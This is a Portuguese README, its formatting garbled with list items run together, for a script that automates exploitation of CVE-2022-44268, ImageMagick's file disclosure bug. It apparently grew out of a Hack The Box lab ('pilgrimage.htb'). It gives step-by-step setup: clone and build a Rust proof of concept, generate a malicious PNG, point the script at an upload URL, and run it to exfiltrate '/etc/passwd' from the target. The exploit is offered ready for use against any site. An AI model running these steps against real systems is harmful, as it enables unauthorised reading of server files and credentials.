
Um script de automação de exploits que se baseia no trabalho da Voidzone security.
Este script automatiza a exploração do CVE-2022-44268 (divulgação de arquivos do ImageMagick).
image.png).exiftool para extrair e imprimir o conteúdo do arquivo exfiltrado.requests do Python: pip install requestshttps://git.rotfl.io/v/CVE-2022-44268.gitcargo build no seu diretório.exiftool.wget.git clone https://git.rotfl.io/v/CVE-2022-44268.gitcd CVE-2022-44268cargo buildautomate_exploit.py) DENTRO do diretório CVE-2022-44268.Você DEVE editar o script Python (automate_exploit.py) para o seu alvo. Principais variáveis a alterar:
payload: Caminho para o image.png malicioso gerado pelo PoC em Rust.
"/home/kali/usr/htb/pilgrimage/CVE-2022-44268/image.png""image.png" (já que o script executa onde o image.png é criado).url: URL alvo para envio de imagem.
"http://pilgrimage.htb""http://vulnerable-site.com/upload").proxies (opcional): Para rotear o tráfego (ex.: através do Burp Suite).
{'http': 'http://127.0.0.1:8080'}None se não for necessário.Cabeçalho Host (dentro do dicionário headers): Deve corresponder ao nome do host na sua url.
'Host': 'pilgrimage.htb'Certifique-se de que está no diretório CVE-2022-44268 (onde estão o automate_exploit.py e o PoC em Rust).
Execute o script, fornecendo o caminho do arquivo alvo para exfiltrar como argumento:
python3 automate_exploit.py "/etc/passwd"